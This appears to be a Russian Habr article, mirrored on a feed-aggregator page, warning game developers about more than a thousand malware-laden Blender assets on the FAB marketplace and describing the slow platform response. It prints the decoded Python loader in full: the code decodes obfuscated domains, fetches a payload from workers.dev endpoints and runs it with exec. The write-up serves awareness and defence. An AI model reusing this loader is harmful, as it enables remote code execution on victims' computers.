惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Engineering at Meta
Engineering at Meta
月光博客
月光博客
WordPress大学
WordPress大学
C
Cisco Blogs
Recent Commits to openclaw:main
Recent Commits to openclaw:main
博客园 - 【当耐特】
大猫的无限游戏
大猫的无限游戏
The GitHub Blog
The GitHub Blog
Google DeepMind News
Google DeepMind News
The Cloudflare Blog
有赞技术团队
有赞技术团队
Microsoft Azure Blog
Microsoft Azure Blog
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
小众软件
小众软件
H
Heimdal Security Blog
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
W
WeLiveSecurity
量子位
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
F
Fortinet All Blogs
T
Threat Research - Cisco Blogs
Attack and Defense Labs
Attack and Defense Labs
P
Privacy & Cybersecurity Law Blog
D
Darknet – Hacking Tools, Hacker News & Cyber Security
NISL@THU
NISL@THU
Forbes - Security
Forbes - Security
L
Lohrmann on Cybersecurity
C
CERT Recently Published Vulnerability Notes
L
LINUX DO - 热门话题
Google Online Security Blog
Google Online Security Blog
S
Security Affairs
V2EX - 技术
V2EX - 技术
TaoSecurity Blog
TaoSecurity Blog
N
News and Events Feed by Topic
N
News | PayPal Newsroom
S
Security @ Cisco Blogs
宝玉的分享
宝玉的分享
Project Zero
Project Zero
The Hacker News
The Hacker News
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
PCI Perspectives
PCI Perspectives
G
GRAHAM CLULEY
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
Y
Y Combinator Blog
N
Netflix TechBlog - Medium
S
Schneier on Security
Application and Cybersecurity Blog
Application and Cybersecurity Blog
www.infosecurity-magazine.com
www.infosecurity-magazine.com
博客园 - 聂微东

Все публикации подряд на Хабре

Ловим музу за клавиатуру: как айтишнику стать автором Что умеет Midjourney в 2026? Мой немного грустный разбор этого шикарного инструмента Никто не любит писать тесты, но ИИ может исправить это IPv8 выглядит как мечта. Поэтому почти наверняка не взлетит Производители вернули в продажу материнки с DDR3. Что происходит? Управление агентом с телефона через Telegram теперь в KodaCode От координации к лидерству: как меняется роль руководителя разработки Я сделала родителям бизнес вместо пенсии: зарабатываем 70 тысяч, мама не даёт продать В три раза быстрее приемка товара и оптимизация трудозатрат на 73%: как «РСТ-Инвент» помог Gulliver Group ИИ-шечный мир победил? О влиянии искусственного интеллекта на игропром Кремль снижает давление на Телеграмм пока Европа строит интернет по паспорту Как CEO, CTO и CIO за 8 часов собрали ИИ-директора, который умеет держать позицию под давлением Как (не) потерять домен за выходные Вместо 8 разных VPS: как я организовал практику студентам на одном сервере Почему твой Open Source проект не замечают? R&D: искусство управления неопределенностью в разработке AI-дефляция: вакансий для разработчиков больше, а рост зарплат — худший за 15 лет Мы отдали управление роботами OpenClaw. Что из этого вышло Галактический ID: система идентификации для всех форм разумной жизни Шесть основ бизнес-анализа: начинаем с вопроса «Кто в игре?» Код-ревью, в котором дело не в коде Данные переехали. Команда — нет Системной подход к сдаче OSWE в 2025 Почему комната управления реактором покрашена в цвет морской пены 4 YAML-файла вместо PySpark: как аналитикам строить пайплайны без разработчиков LLM-агент для поиска свободных доменов: автоматизируем подбор Когда, зачем и как правильно начинать новую сессию в Claude Code? Как я заставил нейросеть писать макросы для FreeCAD Анатомия ИИ‑агента для подбора персонала. От тысячи резюме к топ‑10 за минуты Опыт разработчика как экономика внимания Автономность как точка невозврата: кто будет субъектом в цифровом будущем Обучение ИИ в «диких» условиях: как рутинные действия превращаются в датасеты Как измерить LLM для задач кибербеза: обзор открытых бенчмарков Где хранить код? Сравнение GitHub, GitLab и Bitbucket Математика объясняет, почему нормальное распределение встречается повсюду Почему ваш FinOps не работает: 12 тезисов от практиков Как подписать проектную документацию УКЭП с использованием бесплатных лицензий Pilot Адаптивное администрирование Sigla Vision Я грузил уран в бочки, а потом 20 лет строил ИТ в атомной отрасли Чем позвонить с Эвереста? История и обзор спутниковой связи. Часть 2 Как языковая модель помогает контролировать качество инструктажей по охране труда в металлургии Как не передать на desktop свой IP в РКН Анатомия SAP Privileges: как устроено управление правами в macOS MoneyDev: Сказка про три главных слова Обновлённый токенизатор видео K-VAE 2.0 от Сбера Как сделать диспетчеризацию дома на 1284 квартиры почти бесплатно Как мы разогнали железную дорогу Мы дали агентам рутину. Теперь надо решить — что делать с освободившимся временем Токсичный контент, промпт-хакинг и защита ИИ — всё о Guardrails для LLM Умный город начинается с точного взгляда: как «Фалькон Тех» меняет пространство к лучшему Навайбкодил приложение для анализа графов Почему Дюну так интересно читать? Упрощаем работу с рутиной или как стать Гендальфом Белым Деконструкция Go: CPU, RAM и что там происходит. Go Assembler база. Часть 1.1 Какие профессии исчезнут из-за ИИ, а какие появятся? И что с этим делать Как мы построили IT-отдел, где хочется расти: архитектурные встречи, прозрачные метрики и книжные подарки Rufler: Делаем из Claude Code автономный рой через один YAML-конфиг Sing-box и белый список приложений Как построить надёжный обмен сообщениями в микросервисах: лучшие практики для enterprise OpenAI строит MLM-пирамиду, а McKinsey и Accenture помогают ей в этом Дом, который не построил Фишер (Часть 2) «Сверхзвуковой математик» против «Вдумчивого логиста»: битва алгоритмов 3D-упаковки Мультимодальные модели – грубый и дорогой инструмент Разговоры ничего не стоят. Код тоже Проверки физических лиц: с кого начнет ФНС Топ-10 бесплатных нейросетей для создания видео в 2026 году Первые слои кода: как наши решения сегодня определяют архитектуру ИИ на десятилетия Разработка нового статического анализатора: PVS-Studio JavaScript Поиск уязвимостей ПО: базовый минимум или роскошный максимум Почему оценка персонала не работает как инструмент управления Как мы разработали ИИ-ассистента и сократили рутину продуктовой команды на 50% Как я ушел из найма, нажарил косточек и продал на маркетплейсах на 168 млн в год Когда 1С:ERP уже внедрена, а нормального производственного плана всё ещё нет Как я сделал Claude мультимодальным, подключив к нему Qwen Omni Как приглашение на вакансию мечты превращается в атаку Infrastructure as Code: философия и лучшие практики IaC Тестируем Yandex Code Assistant на задаче, в которой нужно хранить секреты nxs-universal-chart v3.0: новое поколение универсального Helm-чарта Callback Injection: Техника, которая отправила Microsoft Defender в глухой нокаут «Все идеи на стол»: митап как способ вывести проект из тупика Сегодня я узнал нечто новое о GPU благодаря багу в своей игре Как заставить LLM ̶ ̶г̶а̶л̶л̶ю̶ ̶ эволюционировать Карта событий как фундамент аналитики: практический кейс для E-commerce Что выбрать для AI: x86, ARM или RISC-V? Дайджест железа за март Роль соматических мутаций в развитии аутоиммунных заболеваний: путь к избирательной терапии Mythos от Anthropic — тревожный сигнал для всех, а не только для банков Guardrails для LLM на Java: как приручить промпт‑инъекции и токсичные ответы Green-VLA: как мы собрали VLA-модель для реального антропоморфного робота и не потеряли обобщение Финансовая гонка вооружений: почему умные люди добровольно в ней участвуют Эра ИИ-агентов наступила: выбираем лучшего цифрового сотрудника # Практический опыт внедрения WinCC Redundancy на производственном предприятии Сделал MVP за 3 дня, а потом неделю прикручивал оплату. Оно того стоило? Физика против Маска: почему Starship V3 может оказаться ещё одной катастрофой Нефть Венесуэлы: крупнейшие запасы в мире, но не крупнейшая нефтяная держава JPA 4. Переосмысление Hibernate Почему зеркальная фотокамера Nikon D5 десятилетней давности идеально подошла для миссии «Артемида-2» Проект «Уровень-Спутник» или как мы сделали платформу для гидрологов «Замедлиться, чтобы ускориться»: почему ИИ повышает цену ошибок в требованиях и архитектуре Как с нуля поднять трафик IT-компании на 1657% при бюджете 55 тыс. и выжить Pixel-perfect Downsampling — идеальная отрисовка 50 миллионов точек без потерь
Зараженные ассеты на маркетплейсах
El__Comandante · 2026-06-23 · via Все публикации подряд на Хабре

Зараженные ассеты на маркетплейсах

Простой

4 мин

187

Небольшой дисклеймер: данная статья не призвана провести всеобъемлющий анализ, это скорее статья‑предупреждение для начинающих и не только разработчиков компьютерных игр.

Данная статья расскажет о небольшом инциденте, произошедшем на маркетплейсе игровых ассетов FAB. В течение трех суток пользователь с ником AIGUL12 загрузил более тысячи зараженных ассетов, не встречая никакого сопротивления со стороны торговой площадки.

Как все начиналось

В пятницу, а это было 19 июня, я решил глянуть бесплатные ассеты на FAB. Вдруг найдется что-нибудь интересное. И сразу глаз зацепился за кучу ассетов от одного автора.

Вот он, злодей года

Вот он, злодей года

Далее насторожило оформление: всего две картинки, причем вторая — это отзеркаленная копия первой. А описание явно составляла нейросеть. Но на тот момент я думал, что это обычный нейрослоп заливают. Поэтому решил проверить и скачал ассет в формате blend.

И тут-то меня ждал сюрприз: блендер неожиданно выдал предупреждение о наличии скрипта, который я предпочел не запускать и нажал кнопку Ignore.

В файле blend оказался скрипт

В файле blend оказался скрипт

Как работает зловред

Но я был бы не я, если бы не полез смотреть, а что это за скрипт такой. На вид вроде скрипт как скрипт, но мое внимание привлекла длинная строка с кучей символов.

Вредоносный код в зашифрованной строке

Вредоносный код в зашифрованной строке

Как оказалось, это зашифрованная с помощью Base-64 строка, в которой находится вредоносный код. Первые пять символов отбрасываются, а остальное расшифровывается и выполняется с помощью инструкции exec. Эта инструкция выполняет любую переданную строку как живой код, что и позволяет вирусу запуститься прямо в операционной системе. А далее вредоносный код скачивает "полезную" нагрузку на компьютер жертвы.

Расшифрованный вредоносный код
import sys
import base64
import json
 
addon_names = [
    '1$L&6YXJlbmF0aXRhbm9ubGluZQ==',
    '$vBUeYXJlbmF0aXRhbm9ubGluZWYxMg==',
    'G88mubW91dGhydW5uYmV2YTE5ODY=',
    'l%32bdmlvdGl1YmFtYTE5NzU=',
    'mpWQ^ZGlhdGVudGNvdXJubzE5ODE=',
    'JERMgc3BhcmthZGRvbnMyMDAyMTQ=',
    't^W%Gc2hhZG93YWRkb25zMjI5MjU=',
    'QT(#bZ2xpbnRhZGRvbnMxODk2',
    'Q9kscZnJvc3RhZGRvbnMxODk4Nw==',
    'e&o!QbmVvbmFkZG9hc25zMTk5NTg=',
    'oBbQkZHVza2FkZG9zbnMyMDM5OQ==',
    '1l93jc3Rvcm1hZGRkb25zMTk3MzEw',
    '8ljKeZW1iZXJhZGZkb25zMTkxNjAx',
    'RQi6abmlnaHRhZGRnb25zMTkxMjA=',
    'hyn6yYmxhemVhZGQyb25zMjBkMA==',
    'ne%r^Z2hvc3RhZDFvbnMxMTkyODA=',
    '8@r!WcmFpbmRhZDRvbnMxOTExMA==',
    'yBbt7c3RhcmZhZDVvbnMyMDE0MA==',
    'yW4K$dm9pZGFhNmRvbnMxOTI0MA==',
    'YajNPdGh1bmRxZXI3ZGRvbnMxOTQ2MA==',
    ')Cax*YWRkb25zcmZ0NHVzMTk3MDA='
]
 
addon_prefix = "captcha"   
worker_domain = "workers.dev/get-link"
max_attempts = 3
 
 
for obf_name in addon_names:
    
    clean_name = base64.b64decode(obf_name[5:]).decode('utf-8')
    
    url = f"https://{addon_prefix}.{clean_name}.{worker_domain}"
    attempt = 1
    
    while attempt <= max_attempts:
        try:
            import requests
            response = requests.get(url, timeout=10)
            if response.ok:
                data = response.json()
                link = data.get("link")
                if link:
                    
                    clean_link = link[5:]
                    
                    
                    decoded_code = base64.b64decode(clean_link).decode('utf-8')
                    
                    
                    exec(decoded_code)
                    
                    print("Hi")
                    sys.exit(0)  
                    
            attempt += 1
        except Exception as e:
            print(f"Hi Hi {url} (Hi {attempt}): {e}")
            attempt += 1
 
print("Hi Hi Hi")

Попытки предупредить сообщество

Первым делом я отправил два обычных репорта на FAB: на один из ассетов и на самого автора. И получил стандартный ответ, что нарушений не найдено. Тогда я отправил обращение в техподдержку и получил такое:

Thank you for contacting Fab Support!

We appreciate your patience. The Internal team is actively investigating this concern. If you find that you are still interested in the files themselves, our internal team has a workaround for you:

Open a new/current Blender scene. Go to File > Append. Select the .blend file downloaded from Fab to open it. Go to Collections and add the Sofa Asset into your scene.

We appreciate your report.

Please let us know if you need anything further.

Thanks, The Fab Team

То есть вместо того, чтобы заблокировать автора, мне предложили воспользоваться командой Append, чтобы безопасно загрузить 3D-модель.

По итогу мне удалось разместить пару новостей об этом в сообществах ВК. Но все блогеры (что наши, что западные), которым я отправлял информацию о данном инциденте, благополучно проигнорировали меня. А на реддите мою статью об этом не пропустили автоматические фильтры.

Зараженные ассеты удалили... спустя 3 суток

К счастью, спустя три дня на реддите появилась информация о зараженных ассетах. И Epic Games наконец-то отреагировали:

Thanks for the report u/HQuasar — we’ve taken down the account, and we are removing all listings from Fab and users' libraries.

Неутешительные выводы

Какие выводы можно сделать из этого?

Во-первых, механизмы безопасности и предварительной модерации на современных маркетплейсах серьезно дискредитированы. Если они вообще существуют. Скачивая любой чужой ассет, вы всегда должны предполагать, что внутри может находиться вирус. И не важно, официальная это площадка или телеграмм-канал, раздающие бесплатные платные ассеты.

И дело не ограничивается площадкой FAB. На площадке Artstation пользователь ARARAT раздает точно такие же ассеты, только за 1 доллар. И явно не первый день.

Во-вторых, надо понимать, что заражены могут быть не только blend-файлы. Опасность может исходить и от плагинов Unreal engine, и пакетов unity, и файлов других 3D-программ. Кроме того, под сомнением и новая система «Get Extensions» в Blender. Когда вы нажимаете кнопку Install, Blender скачивает архив и выполняет заложенный в расширение Python-код.

Будьте бдительны и помните: в современном геймдеве фраза «я просто скачал модельку» может стоить вам потери всего проекта.